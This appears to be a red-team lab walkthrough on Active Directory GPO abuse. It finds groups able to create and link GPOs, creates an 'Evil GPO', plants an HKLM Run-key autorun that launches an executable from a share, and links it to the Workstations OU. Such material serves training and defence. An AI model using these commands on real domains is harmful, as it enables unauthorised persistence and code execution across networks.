Create & Link a GPO

Find principals that can create new GPOs in the domain

powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

DEV\Developers

Being able to create a GPO doesn't achieve anything unless it can be linked to an OU

Look for linkable OU's

powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl

ObjectDN              : OU=Workstations,DC=dev,DC=cyberbotic,DC=io

This shows that members of the "Developers" group can link GPOs to the "Workstations" OU.

Check if required module present on machine

powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

Backup-GPO                 Backup-GPO                
Block-GPInheritance        Block-GPInheritance       
Copy-GPO                   Copy-GPO                  
Get-GPInheritance          Get-GPInheritance         
Get-GPO                    Get-GPO

Necessary module not present? Use SharpGPO instead -> SharpGPO/SharpGPOAbuse

Create and link a new GPO

powershell New-GPO -Name "Evil GPO"

Some abuses can be implemented directly using RSAT. For example, the Set-GPPrefRegistryValue cmdlet can be used to add an HKLM autorun key to the registry.

powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString

Be sure executable is present in the share

Next, apply the GPO to the target OU

powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"

Remember that HKLM autoruns require a reboot to execute

Last updated 2 years ago